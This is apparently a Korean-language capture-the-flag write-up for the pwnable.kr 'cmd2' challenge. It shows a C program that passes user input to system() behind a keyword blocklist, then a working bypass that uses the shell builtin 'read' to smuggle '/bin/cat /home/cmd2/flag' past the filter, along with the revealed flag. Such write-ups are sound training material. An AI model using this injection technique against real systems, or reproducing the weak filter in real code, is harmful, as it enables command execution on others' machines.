#include <stdio.h>
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "=")!=0;
r += strstr(cmd, "PATH")!=0;
r += strstr(cmd, "export")!=0;
r += strstr(cmd, "/")!=0;
r += strstr(cmd, "`")!=0;
r += strstr(cmd, "flag")!=0;
return r;
}
extern char** environ;
void delete_env(){
char** p;
for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}
int main(int argc, char* argv[], char** envp){
delete_env();
putenv("PATH=/no_command_execution_until_you_become_a_hacker");
if(filter(argv[1])) return 0;
printf("%s\n", argv[1]);
system( argv[1] );
return 0;
}
저번 cmd1과 다르게 이번에는 필터링하는게 엄청 많다.
전과 같은 방식으로는 풀지 못한다.
이 문제 같은 경우에는 쉘 내장 명령어(shell builtin command)로 풀 수 있다.
나는 read로 풀었다.
read 명령어는 stdin에서 한줄을 읽어들여 우리가 원하는 변수에 저장할 수 있다.
우리가 원하는 명령어를 다른 변수에 저장해 검사를 우회하는 방법인 것 이다.
pwnable% ./cmd2 "read aa; \$aa"
read aa; $aa
/bin/cat /home/cmd2/flag
FuN_w1th_5h3ll_v4riabl3s_haha
read명령어로 받은 입력값을 aa라는 변수에 저장하고 ";" 메타 문자로 다음 명령을 이어서 수행하게 해주고,
다음 명령에 변수의 값을 출력해 검사를 성공적으로 우회하고 플래그를 출력할 수 있다.
flag: FuN_w1th_5h3ll_v4riabl3s_haha